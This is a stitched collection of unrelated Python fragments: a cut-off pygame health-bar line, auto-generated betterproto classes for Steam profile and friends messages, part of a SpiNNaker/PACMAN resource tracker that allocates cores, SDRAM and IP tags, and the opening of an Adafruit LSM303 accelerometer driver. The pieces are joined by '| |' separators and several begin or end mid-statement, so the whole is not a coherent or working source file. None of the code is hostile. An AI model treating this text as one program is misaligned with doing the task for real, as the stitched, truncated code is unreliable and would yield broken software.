# avialable health (green) is dependent on the ratio of health remaining to damage taken
pygame.draw.rect(surface, (0,255,0), (self.x + round(self.width*0.1), | |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# sources: steammessages_parental.steamclient.proto
# plugin: python-betterproto
# Last updated 09/09/2021
from dataclasses import dataclass
from typing import List
import betterproto
class EProfileCustomizationType(betterproto.Enum):
Invalid = 0
RareAchievementShowcase = 1
GameCollector = 2
ItemShowcase = 3
TradeShowcase = 4
Badges = 5
FavoriteGame = 6
ScreenshotShowcase = 7
CustomText = 8
FavoriteGroup = 9
Recommendation = 10
WorkshopItem = 11
MyWorkshop = 12
ArtworkShowcase = 13
VideoShowcase = 14
Guides = 15
MyGuides = 16
Achievements = 17
Greenlight = 18
MyGreenlight = 19
Salien = 20
LoyaltyRewardReactions = 21
SingleArtworkShowcase = 22
AchievementsCompletionist = 23
class EBanContentCheckResult(betterproto.Enum):
NotScanned = 0
Reset = 1
NeedsChecking = 2
VeryUnlikely = 5
Unlikely = 30
Possible = 50
Likely = 75
VeryLikely = 100
class EProfileCustomizationStyle(betterproto.Enum):
Default = 0
Selected = 1
Rarest = 2
MostRecent = 3
Random = 4
HighestRated = 5
class EAgreementType(betterproto.Enum):
Invalid = -1
GlobalSSA = 0
ChinaSSA = 1
class ENotificationSetting(betterproto.Enum):
UseDefault = 0
Always = 1
Never = 2
class ETextFilterSetting(betterproto.Enum):
SteamLabOptedOut = 0
Enabled = 1
EnabledAllowProfanity = 2
Disabled = 3
@dataclass(eq=False, repr=False)
class GetMutualFriendsForIncomingInvitesRequest(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class IncomingInviteMutualFriendList(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
mutual_friend_account_ids: List[int] = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class GetMutualFriendsForIncomingInvitesResponse(betterproto.Message):
incoming_invite_mutual_friends_lists: List["IncomingInviteMutualFriendList"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class GetOwnedGamesRequest(betterproto.Message):
steamid: int = betterproto.uint64_field(1)
include_appinfo: bool = betterproto.bool_field(2)
include_played_free_games: bool = betterproto.bool_field(3)
appids_filter: List[int] = betterproto.uint32_field(4)
include_free_sub: bool = betterproto.bool_field(5)
skip_unvetted_apps: bool = betterproto.bool_field(6)
@dataclass(eq=False, repr=False)
class GetOwnedGamesResponse(betterproto.Message):
game_count: int = betterproto.uint32_field(1)
games: List["GetOwnedGamesResponseGame"] = betterproto.message_field(2)
@dataclass(eq=False, repr=False)
class GetOwnedGamesResponseGame(betterproto.Message):
appid: int = betterproto.int32_field(1)
name: str = betterproto.string_field(2)
playtime_2_weeks: int = betterproto.int32_field(3)
playtime_forever: int = betterproto.int32_field(4)
img_icon_url: str = betterproto.string_field(5)
img_logo_url: str = betterproto.string_field(6)
has_community_visible_stats: bool = betterproto.bool_field(7)
playtime_windows_forever: int = betterproto.int32_field(8)
playtime_mac_forever: int = betterproto.int32_field(9)
playtime_linux_forever: int = betterproto.int32_field(10)
@dataclass(eq=False, repr=False)
class GetPlayNextRequest(betterproto.Message):
max_age_seconds: int = betterproto.uint32_field(1)
ignore_appids: List[int] = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class GetPlayNextResponse(betterproto.Message):
last_update_time: int = betterproto.uint32_field(1)
appids: List[int] = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class GetFriendsGameplayInfoRequest(betterproto.Message):
appid: int = betterproto.uint32_field(1)
@dataclass(eq=False, repr=False)
class GetFriendsGameplayInfoResponse(betterproto.Message):
your_info: "GetFriendsGameplayInfoResponseOwnGameplayInfo" = betterproto.message_field(1)
in_game: List["GetFriendsGameplayInfoResponseFriendsGameplayInfo"] = betterproto.message_field(2)
played_recently: List["GetFriendsGameplayInfoResponseFriendsGameplayInfo"] = betterproto.message_field(3)
played_ever: List["GetFriendsGameplayInfoResponseFriendsGameplayInfo"] = betterproto.message_field(4)
owns: List["GetFriendsGameplayInfoResponseFriendsGameplayInfo"] = betterproto.message_field(5)
in_wishlist: List["GetFriendsGameplayInfoResponseFriendsGameplayInfo"] = betterproto.message_field(6)
@dataclass(eq=False, repr=False)
class GetFriendsGameplayInfoResponseFriendsGameplayInfo(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
minutes_played: int = betterproto.uint32_field(2)
minutes_played_forever: int = betterproto.uint32_field(3)
@dataclass(eq=False, repr=False)
class GetFriendsGameplayInfoResponseOwnGameplayInfo(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
minutes_played: int = betterproto.uint32_field(2)
minutes_played_forever: int = betterproto.uint32_field(3)
in_wishlist: bool = betterproto.bool_field(4)
owned: bool = betterproto.bool_field(5)
@dataclass(eq=False, repr=False)
class GetFriendsAppsActivityRequest(betterproto.Message):
news_language: str = betterproto.string_field(1)
request_flags: int = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class GetFriendsAppsActivityResponse(betterproto.Message):
trending: List["GetFriendsAppsActivityResponseAppFriendsInfo"] = betterproto.message_field(1)
recent_purchases: List["GetFriendsAppsActivityResponseAppFriendsInfo"] = betterproto.message_field(2)
unowned: List["GetFriendsAppsActivityResponseAppFriendsInfo"] = betterproto.message_field(3)
popular: List["GetFriendsAppsActivityResponseAppFriendsInfo"] = betterproto.message_field(4)
dont_forget: List["GetFriendsAppsActivityResponseAppFriendsInfo"] = betterproto.message_field(5)
being_discussed: List["GetFriendsAppsActivityResponseAppFriendsInfo"] = betterproto.message_field(6)
new_to_group: List["GetFriendsAppsActivityResponseAppFriendsInfo"] = betterproto.message_field(7)
returned_to_group: List["GetFriendsAppsActivityResponseAppFriendsInfo"] = betterproto.message_field(8)
active_friend_count: int = betterproto.uint32_field(9)
@dataclass(eq=False, repr=False)
class GetFriendsAppsActivityResponseFriendPlayTime(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
minutes_played_this_week: int = betterproto.uint32_field(2)
minutes_played_two_weeks: int = betterproto.uint32_field(3)
minutes_played_forever: int = betterproto.uint32_field(4)
event_count: int = betterproto.uint32_field(5)
@dataclass(eq=False, repr=False)
class GetFriendsAppsActivityResponseAppFriendsInfo(betterproto.Message):
appid: int = betterproto.uint32_field(1)
friends: List["GetFriendsAppsActivityResponseFriendPlayTime"] = betterproto.message_field(2)
display_order: int = betterproto.uint32_field(3)
@dataclass(eq=False, repr=False)
class GetGameBadgeLevelsRequest(betterproto.Message):
appid: int = betterproto.uint32_field(1)
@dataclass(eq=False, repr=False)
class GetGameBadgeLevelsResponse(betterproto.Message):
player_level: int = betterproto.uint32_field(1)
badges: List["GetGameBadgeLevelsResponseBadge"] = betterproto.message_field(2)
@dataclass(eq=False, repr=False)
class GetGameBadgeLevelsResponseBadge(betterproto.Message):
level: int = betterproto.int32_field(1)
series: int = betterproto.int32_field(2)
border_color: int = betterproto.uint32_field(3)
@dataclass(eq=False, repr=False)
class GetProfileBackgroundRequest(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
language: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class ProfileItem(betterproto.Message):
communityitemid: int = betterproto.uint64_field(1)
image_small: str = betterproto.string_field(2)
image_large: str = betterproto.string_field(3)
name: str = betterproto.string_field(4)
item_title: str = betterproto.string_field(5)
item_description: str = betterproto.string_field(6)
appid: int = betterproto.uint32_field(7)
item_type: int = betterproto.uint32_field(8)
item_class: int = betterproto.uint32_field(9)
movie_webm: str = betterproto.string_field(10)
movie_mp4: str = betterproto.string_field(11)
movie_webm_small: str = betterproto.string_field(13)
movie_mp4_small: str = betterproto.string_field(14)
equipped_flags: int = betterproto.uint32_field(12)
@dataclass(eq=False, repr=False)
class GetProfileBackgroundResponse(betterproto.Message):
profile_background: "ProfileItem" = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class SetProfileBackgroundRequest(betterproto.Message):
communityitemid: int = betterproto.uint64_field(1)
@dataclass(eq=False, repr=False)
class SetProfileBackgroundResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetMiniProfileBackgroundRequest(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
language: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class GetMiniProfileBackgroundResponse(betterproto.Message):
profile_background: "ProfileItem" = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class SetMiniProfileBackgroundRequest(betterproto.Message):
communityitemid: int = betterproto.uint64_field(1)
@dataclass(eq=False, repr=False)
class SetMiniProfileBackgroundResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetAvatarFrameRequest(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
language: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class GetAvatarFrameResponse(betterproto.Message):
avatar_frame: "ProfileItem" = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class SetAvatarFrameRequest(betterproto.Message):
communityitemid: int = betterproto.uint64_field(1)
@dataclass(eq=False, repr=False)
class SetAvatarFrameResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetAnimatedAvatarRequest(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
language: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class GetAnimatedAvatarResponse(betterproto.Message):
avatar: "ProfileItem" = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class SetAnimatedAvatarRequest(betterproto.Message):
communityitemid: int = betterproto.uint64_field(1)
@dataclass(eq=False, repr=False)
class SetAnimatedAvatarResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetProfileItemsOwnedRequest(betterproto.Message):
language: str = betterproto.string_field(1)
@dataclass(eq=False, repr=False)
class GetProfileItemsOwnedResponse(betterproto.Message):
profile_backgrounds: List["ProfileItem"] = betterproto.message_field(1)
mini_profile_backgrounds: List["ProfileItem"] = betterproto.message_field(2)
avatar_frames: List["ProfileItem"] = betterproto.message_field(3)
animated_avatars: List["ProfileItem"] = betterproto.message_field(4)
profile_modifiers: List["ProfileItem"] = betterproto.message_field(5)
@dataclass(eq=False, repr=False)
class GetProfileItemsEquippedRequest(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
language: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class GetProfileItemsEquippedResponse(betterproto.Message):
profile_background: "ProfileItem" = betterproto.message_field(1)
mini_profile_background: "ProfileItem" = betterproto.message_field(2)
avatar_frame: "ProfileItem" = betterproto.message_field(3)
animated_avatar: "ProfileItem" = betterproto.message_field(4)
profile_modifier: "ProfileItem" = betterproto.message_field(5)
@dataclass(eq=False, repr=False)
class SetEquippedProfileItemFlagsRequest(betterproto.Message):
communityitemid: int = betterproto.uint64_field(1)
flags: int = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class SetEquippedProfileItemFlagsResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetEmoticonListRequest(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetEmoticonListResponse(betterproto.Message):
emoticons: List["GetEmoticonListResponseEmoticon"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class GetEmoticonListResponseEmoticon(betterproto.Message):
name: str = betterproto.string_field(1)
count: int = betterproto.int32_field(2)
time_last_used: int = betterproto.uint32_field(3)
use_count: int = betterproto.uint32_field(4)
time_received: int = betterproto.uint32_field(5)
appid: int = betterproto.uint32_field(6)
@dataclass(eq=False, repr=False)
class GetAchievementsProgressRequest(betterproto.Message):
steamid: int = betterproto.uint64_field(1)
language: str = betterproto.string_field(2)
appids: List[int] = betterproto.uint32_field(3)
@dataclass(eq=False, repr=False)
class GetAchievementsProgressResponse(betterproto.Message):
achievement_progress: List["GetAchievementsProgressResponseAchievementProgress"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class GetAchievementsProgressResponseAchievementProgress(betterproto.Message):
appid: int = betterproto.uint32_field(1)
unlocked: int = betterproto.uint32_field(2)
total: int = betterproto.uint32_field(3)
percentage: float = betterproto.float_field(4)
all_unlocked: bool = betterproto.bool_field(5)
cache_time: int = betterproto.uint32_field(6)
@dataclass(eq=False, repr=False)
class GetFavoriteBadgeRequest(betterproto.Message):
steamid: int = betterproto.uint64_field(1)
@dataclass(eq=False, repr=False)
class GetFavoriteBadgeResponse(betterproto.Message):
has_favorite_badge: bool = betterproto.bool_field(1)
badgeid: int = betterproto.uint32_field(2)
communityitemid: int = betterproto.uint64_field(3)
item_type: int = betterproto.uint32_field(4)
border_color: int = betterproto.uint32_field(5)
appid: int = betterproto.uint32_field(6)
level: int = betterproto.uint32_field(7)
@dataclass(eq=False, repr=False)
class SetFavoriteBadgeRequest(betterproto.Message):
communityitemid: int = betterproto.uint64_field(1)
badgeid: int = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class SetFavoriteBadgeResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetProfileCustomizationRequest(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
include_inactive_customizations: bool = betterproto.bool_field(2)
include_purchased_customizations: bool = betterproto.bool_field(3)
@dataclass(eq=False, repr=False)
class ProfileCustomizationSlot(betterproto.Message):
slot: int = betterproto.uint32_field(1)
appid: int = betterproto.uint32_field(2)
publishedfileid: int = betterproto.uint64_field(3)
item_assetid: int = betterproto.uint64_field(4)
item_contextid: int = betterproto.uint64_field(5)
notes: str = betterproto.string_field(6)
title: str = betterproto.string_field(7)
accountid: int = betterproto.uint32_field(8)
badgeid: int = betterproto.uint32_field(9)
border_color: int = betterproto.uint32_field(10)
item_classid: int = betterproto.uint64_field(11)
item_instanceid: int = betterproto.uint64_field(12)
ban_check_result: "EBanContentCheckResult" = betterproto.enum_field(13)
@dataclass(eq=False, repr=False)
class ProfileCustomization(betterproto.Message):
customization_type: "EProfileCustomizationType" = betterproto.enum_field(1)
large: bool = betterproto.bool_field(2)
slots: List["ProfileCustomizationSlot"] = betterproto.message_field(3)
active: bool = betterproto.bool_field(4)
customization_style: "EProfileCustomizationStyle" = betterproto.enum_field(5)
purchaseid: int = betterproto.uint64_field(6)
level: int = betterproto.uint32_field(7)
@dataclass(eq=False, repr=False)
class ProfileTheme(betterproto.Message):
theme_id: str = betterproto.string_field(1)
title: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class ProfilePreferences(betterproto.Message):
hide_profile_awards: bool = betterproto.bool_field(1)
@dataclass(eq=False, repr=False)
class GetProfileCustomizationResponse(betterproto.Message):
customizations: List["ProfileCustomization"] = betterproto.message_field(1)
slots_available: int = betterproto.uint32_field(2)
profile_theme: "ProfileTheme" = betterproto.message_field(3)
purchased_customizations: List["GetProfileCustomizationResponsePurchasedCustomization"] = betterproto.message_field(
4
)
profile_preferences: "ProfilePreferences" = betterproto.message_field(5)
@dataclass(eq=False, repr=False)
class GetProfileCustomizationResponsePurchasedCustomization(betterproto.Message):
purchaseid: int = betterproto.uint64_field(1)
customization_type: "EProfileCustomizationType" = betterproto.enum_field(2)
level: int = betterproto.uint32_field(3)
@dataclass(eq=False, repr=False)
class GetPurchasedProfileCustomizationsRequest(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
@dataclass(eq=False, repr=False)
class GetPurchasedProfileCustomizationsResponse(betterproto.Message):
purchased_customizations: List[
"GetPurchasedProfileCustomizationsResponsePurchasedCustomization"
] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class GetPurchasedProfileCustomizationsResponsePurchasedCustomization(betterproto.Message):
purchaseid: int = betterproto.uint64_field(1)
customization_type: "EProfileCustomizationType" = betterproto.enum_field(2)
@dataclass(eq=False, repr=False)
class GetPurchasedAndUpgradedProfileCustomizationsRequest(betterproto.Message):
steamid: int = betterproto.fixed64_field(1)
@dataclass(eq=False, repr=False)
class GetPurchasedAndUpgradedProfileCustomizationsResponse(betterproto.Message):
purchased_customizations: List[
"GetPurchasedAndUpgradedProfileCustomizationsResponsePurchasedCustomization"
] = betterproto.message_field(1)
upgraded_customizations: List[
"GetPurchasedAndUpgradedProfileCustomizationsResponseUpgradedCustomization"
] = betterproto.message_field(2)
@dataclass(eq=False, repr=False)
class GetPurchasedAndUpgradedProfileCustomizationsResponsePurchasedCustomization(betterproto.Message):
customization_type: "EProfileCustomizationType" = betterproto.enum_field(1)
count: int = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class GetPurchasedAndUpgradedProfileCustomizationsResponseUpgradedCustomization(betterproto.Message):
customization_type: "EProfileCustomizationType" = betterproto.enum_field(1)
level: int = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class GetProfileThemesAvailableRequest(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetProfileThemesAvailableResponse(betterproto.Message):
profile_themes: List["ProfileTheme"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class SetProfileThemeRequest(betterproto.Message):
theme_id: str = betterproto.string_field(1)
@dataclass(eq=False, repr=False)
class SetProfileThemeResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class SetProfilePreferencesRequest(betterproto.Message):
profile_preferences: "ProfilePreferences" = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class SetProfilePreferencesResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class PostStatusToFriendsRequest(betterproto.Message):
appid: int = betterproto.uint32_field(1)
status_text: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class PostStatusToFriendsResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetPostedStatusRequest(betterproto.Message):
steamid: int = betterproto.uint64_field(1)
postid: int = betterproto.uint64_field(2)
@dataclass(eq=False, repr=False)
class GetPostedStatusResponse(betterproto.Message):
accountid: int = betterproto.uint32_field(1)
postid: int = betterproto.uint64_field(2)
status_text: str = betterproto.string_field(3)
deleted: bool = betterproto.bool_field(4)
appid: int = betterproto.uint32_field(5)
@dataclass(eq=False, repr=False)
class DeletePostedStatusRequest(betterproto.Message):
postid: int = betterproto.uint64_field(1)
@dataclass(eq=False, repr=False)
class DeletePostedStatusResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetLastPlayedTimesRequest(betterproto.Message):
min_last_played: int = betterproto.uint32_field(1)
@dataclass(eq=False, repr=False)
class GetLastPlayedTimesResponse(betterproto.Message):
games: List["GetLastPlayedTimesResponseGame"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class GetLastPlayedTimesResponseGame(betterproto.Message):
appid: int = betterproto.int32_field(1)
last_playtime: int = betterproto.uint32_field(2)
playtime_2_weeks: int = betterproto.int32_field(3)
playtime_forever: int = betterproto.int32_field(4)
first_playtime: int = betterproto.uint32_field(5)
playtime_windows_forever: int = betterproto.int32_field(6)
playtime_mac_forever: int = betterproto.int32_field(7)
playtime_linux_forever: int = betterproto.int32_field(8)
first_windows_playtime: int = betterproto.uint32_field(9)
first_mac_playtime: int = betterproto.uint32_field(10)
first_linux_playtime: int = betterproto.uint32_field(11)
last_windows_playtime: int = betterproto.uint32_field(12)
last_mac_playtime: int = betterproto.uint32_field(13)
last_linux_playtime: int = betterproto.uint32_field(14)
@dataclass(eq=False, repr=False)
class AcceptSsaRequest(betterproto.Message):
agreement_type: "EAgreementType" = betterproto.enum_field(1)
time_signed_utc: int = betterproto.uint32_field(2)
@dataclass(eq=False, repr=False)
class AcceptSsaResponse(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetNicknameListRequest(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class GetNicknameListResponse(betterproto.Message):
nicknames: List["GetNicknameListResponsePlayerNickname"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class GetNicknameListResponsePlayerNickname(betterproto.Message):
accountid: int = betterproto.fixed32_field(1)
nickname: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class GetPerFriendPreferencesRequest(betterproto.Message):
pass
@dataclass(eq=False, repr=False)
class PerFriendPreferences(betterproto.Message):
accountid: int = betterproto.fixed32_field(1)
nickname: str = betterproto.string_field(2)
notifications_showingame: "ENotificationSetting" = betterproto.enum_field(3)
notifications_showonline: "ENotificationSetting" = betterproto.enum_field(4)
notifications_showmessages: "ENotificationSetting" = betterproto.enum_field(5)
sounds_showingame: "ENotificationSetting" = betterproto.enum_field(6)
sounds_showonline: "ENotificationSetting" = betterproto.enum_field(7)
sounds_showmessages: "ENotificationSetting" = betterproto.enum_field(8)
notifications_sendmobile: "ENotificationSetting" = betterproto.enum_field(9)
@dataclass(eq=False, repr=False)
class GetPerFriendPreferencesResponse(betterproto.Message):
preferences: List["PerFriendPreferences"] = betterproto.message_field(1)
@dataclass(eq=False, | |
int or None
:param resources: The resources to be allocated
:type resources:\
:py:class:`pacman.model.resources.resource_container.ResourceContainer`
:return: True if there is a core available given the constraints, or\
False otherwise
:rtype: bool
"""
# TODO: Check the resources can be met with the processor
# Currently assumes all processors are equal and that resources
# haven't been over allocated
if processor_id is not None:
if (key in self._core_tracker and
processor_id not in self._core_tracker[key]):
return False
elif key not in self._core_tracker:
processor = chip.get_processor_with_id(processor_id)
return processor is not None and not processor.is_monitor
elif key in self._core_tracker:
return len(self._core_tracker[key]) != 0
return True
def _get_matching_ip_tag(self, board_address, tag, key):
""" Locate a tag for a tag id on a board address for a given chip
:param board_address: the board address to locate the chip on
:type board_address: str or None
:param tag: the tag id to locate
:type tag: int or None
:param key: The (x, y) coordinates of the chip
:type key: tuple of (int int)
:return: A board address and tag id, or None, None if none
:rtype: tuple of (str, int) or (None, None)
"""
if key not in self._ip_tags_address_and_port:
return None, None
existing_tags = self._ip_tags_address_and_port[key]
if board_address is None and tag is not None:
for (b_address, a_tag) in existing_tags:
if a_tag == tag:
return b_address, a_tag
elif board_address is not None and tag is None:
for (b_address, a_tag) in existing_tags:
if b_address == board_address:
return b_address, a_tag
elif board_address is None and tag is None:
return iter(existing_tags).next()
elif (board_address, tag) in existing_tags:
return board_address, tag
return None, None
def _is_tag_available(self, board_address, tag):
""" Check if a tag is available given the constraints
:param board_address: the board address to locate the chip on
:type board_address: str or None
:param tag: the tag id to locate
:type tag: int or None
:return: True if the tag is available, False otherwise
:rtype: bool
"""
if board_address is None and tag is not None:
for board_address in self._boards_with_ip_tags:
if (board_address not in self._tags_by_board or
tag in self._tags_by_board[board_address]):
return True
return False
elif board_address is not None and tag is None:
return board_address in self._boards_with_ip_tags
elif board_address is None and tag is None:
return len(self._boards_with_ip_tags) > 0
return (board_address not in self._tags_by_board or
tag in self._tags_by_board[board_address])
def _is_ip_tag_available(self, board_address, tag, ip_address, port,
strip_sdp):
""" Check if an iptag is available given the constraints
:param board_address: the board address to locate the chip on
:type board_address: str or None
:param tag: the tag id to locate
:type tag: int or None
:param ip_address: the ip address of the tag to be assigned
:type ip_address: str
:param port: the port number of the tag to be assigned
:type port: int
:param strip_sdp: if the iptag has to be able to strip the SDP header
:type strip_sdp: bool
:return: True if a matching iptag is available, False otherwise
:rtype: bool
"""
# If something is already sending to the same ip address and port but
# is performing the opposite operation for strip SDP, then no tag can
# be allocated
reverse_strip_key = (ip_address, port, not strip_sdp)
if reverse_strip_key in self._ip_tags_address_and_port:
return False
# If the same key is being used for another ip tag, re-use it
key = (ip_address, port, strip_sdp)
(b_address, _) = self._get_matching_ip_tag(board_address, tag, key)
if b_address is not None:
return True
# Otherwise determine if another tag is available
return self._is_tag_available(board_address, tag)
def _are_ip_tags_available(self, chip, board_address, ip_tags):
""" Check if the set of tags are available using the given chip,\
given the constraints
:param chip: the (x, y) coordinates of the chip to check
:type chip: (int, int)
:param board_address: the board to allocate ip tags on
:type board_address: str or None
:param ip_tags: The ip tag constraints
:type ip_tags: iterable of\
:py:class:`pacman.model.constraints.tag_allocator_constraints.tag_allocator_require_iptag_constraint.TagAllocatorRequireIptagConstraint`
:return: True if the tags can be allocated, False otherwise
:rtype: bool
"""
# If there are no tags to assign, declare that they are available
if ip_tags is None or len(ip_tags) == 0:
return True
# If there is a fixed board address and the chip is not on the board
# the tags are not available
if (board_address is not None and (chip.x, chip.y)
not in self._ethernet_area_codes[board_address]):
return False
# Check if each of the tags is available
for ip_tag in ip_tags:
if not self._is_ip_tag_available(board_address, ip_tag.tag,
ip_tag.ip_address, ip_tag.port,
ip_tag.strip_sdp):
return False
return True
def _is_reverse_ip_tag_available(self, board_address, tag, port):
""" Check if the reverse ip tag is available given the constraints
:param board_address: The board address to use
:type board_address: str or None
:param tag: The tag to be used
:type tag: int or None
:param port: The port that the tag will listen on on the board
:type port: int
:return: True if the tag is available, false otherwise
:rtype: int
"""
if board_address is not None:
# If the board address is not None, and the port is already
# assigned, the tag is not available
if (board_address, port) in self._reverse_ip_tag_listen_port:
return False
# If the port is available, return true if the tag is available
return self._is_tag_available(board_address, tag)
# If the board address is not None but the port is already used
# everywhere that the tag is available, the tag is not available
port_available = False
for b_address in self._boards_with_ip_tags:
if ((b_address, port) not in self._reverse_ip_tag_listen_port and
self._is_tag_available(b_address, tag)):
port_available = True
break
return port_available
def _are_reverse_ip_tags_available(self, chip, board_address,
reverse_ip_tags):
""" Check if this chip can be used given the reverse ip tag constraints
:param chip: The coordinates of the chip to check
:type chip: (int, int)
:param board_address: the board to allocate ip tags on
:type board_address: str or None
:param reverse_ip_tags: The reverse ip tag constraints to be met
:type reverse_ip_tags: iterable of \
:py:class:`pacman.model.constraints.tag_allocator_constraints.tag_allocator_require_reverse_iptag_constraint.TagAllocatorRequireReverseIptagConstraint`
:return: True if the chip can be used, False otherwise
:rtype: bool
"""
# If there are no tags, declare they are available
if reverse_ip_tags is None or len(reverse_ip_tags) == 0:
return True
# If there is a fixed board address and the chip is not on the board
# the tags are not available
if (board_address is not None and not (chip.x, chip.y)
in self._ethernet_area_codes[board_address]):
return False
for ip_tag in reverse_ip_tags:
if not self._is_reverse_ip_tag_available(board_address,
ip_tag.tag, ip_tag.port):
return False
return True
def _allocate_sdram(self, chip, key, resources):
""" Allocates the SDRAM on the given chip
:param chip: The chip to allocate the resources of
:type chip: :py:class:`spinn_machine.chip.Chip`
:param key: The (x, y) coordinates of the chip
:type key: tuple of (int, int)
:param resources: the resources containing the SDRAM required
:type resources:\
:py:class:`pacman.model.resources.resource_container.ResourceContainer`
"""
if key not in self._sdram_tracker:
self._sdram_tracker[key] = resources.sdram.get_value()
else:
self._sdram_tracker[key] += resources.sdram.get_value()
def _allocate_core(self, chip, key, processor_id, resources):
""" Allocates a core on the given chip
:param chip: The chip to allocate the resources of
:type chip: :py:class:`spinn_machine.chip.Chip`
:param key: The (x, y) coordinates of the chip
:type key: tuple of (int, int)
:param processor_id: The id of the processor to allocate
:type processor_id: int
:param resources: the resources containing the SDRAM required
:type resources:\
:py:class:`pacman.model.resources.resource_container.ResourceContainer`
"""
if key not in self._core_tracker:
self._core_tracker[key] = set()
for processor in chip.processors:
if not processor.is_monitor:
self._core_tracker[key].add(processor.processor_id)
if processor_id is not None:
self._core_tracker[key].remove(processor_id)
else:
# TODO: Find a core that meets the resource requirements
processor_id = self._core_tracker[key].pop()
if len(self._core_tracker[key]) == 0:
self._chips_available.remove(key)
return processor_id
def _allocate_tag(self, board_address, tag):
""" Allocate a tag given the constraints
:param board_address: the board address to allocate to
:type board_address: str or None
:param tag: the tag id to allocate on this board address
:type tag: int or None
:return: a tuple of (board_address and tag)
:rtype: (str, int)
"""
if board_address is None and tag is not None:
for b_address in self._boards_with_ip_tags:
if (b_address not in self._tags_by_board or
tag in self._tags_by_board[b_address]):
board_address = b_address
break
elif board_address is None and tag is None:
board_address = iter(self._boards_with_ip_tags).next()
| |
<gh_stars>0
# SPDX-FileCopyrightText: 2019 <NAME> for Adafruit Industries
#
# SPDX-License-Identifier: MIT
"""
`adafruit_lsm303_accel`
====================================================
CircuitPython driver for the accelerometer in LSM303 sensors.
* Author(s): <NAME>, <NAME>
Implementation Notes
--------------------
**Hardware:**
* Adafruit `Triple-axis Accelerometer+Magnetometer (Compass) Board - LSM303
<https://www.adafruit.com/product/1120>`_ (Product ID: 1120)
* Adafruit `FLORA Accelerometer/Compass Sensor - LSM303 - v1.0
<https://www.adafruit.com/product/1247>`_ (Product ID: 1247)
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://circuitpython.org/downloads
* Adafruit's Bus Device library:
https://github.com/adafruit/Adafruit_CircuitPython_BusDevice
"""
import struct
from micropython import const
from adafruit_bus_device.i2c_device import I2CDevice
from adafruit_register.i2c_struct import UnaryStruct
from adafruit_register.i2c_bit import RWBit, ROBit
from adafruit_register.i2c_bits import RWBits
from adafruit_register.i2c_struct_array import StructArray
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_LSM303_Accel.git"
_ADDRESS_ACCEL = const(0x19) # (0x32 >> 1) // 0011001x
_ADDRESS_MAG = const(0x1E) # (0x3C >> 1) // 0011110x
_ID = const(0xD4) # (0b11010100)
# Accelerometer registers
_REG_ACCEL_WHO_AM_I = const(0x0F)
_REG_ACCEL_CTRL_REG1_A = const(0x20)
_REG_ACCEL_CTRL_REG2_A = const(0x21)
_REG_ACCEL_CTRL_REG3_A = const(0x22)
_REG_ACCEL_CTRL_REG4_A = const(0x23)
_REG_ACCEL_CTRL_REG5_A = const(0x24)
_REG_ACCEL_CTRL_REG6_A = const(0x25)
_REG_ACCEL_REFERENCE_A = const(0x26)
_REG_ACCEL_STATUS_REG_A = const(0x27)
_REG_ACCEL_OUT_X_L_A = const(0x28)
_REG_ACCEL_OUT_X_H_A = const(0x29)
_REG_ACCEL_OUT_Y_L_A = const(0x2A)
_REG_ACCEL_OUT_Y_H_A = const(0x2B)
_REG_ACCEL_OUT_Z_L_A = const(0x2C)
_REG_ACCEL_OUT_Z_H_A = const(0x2D)
_REG_ACCEL_FIFO_CTRL_REG_A = const(0x2E)
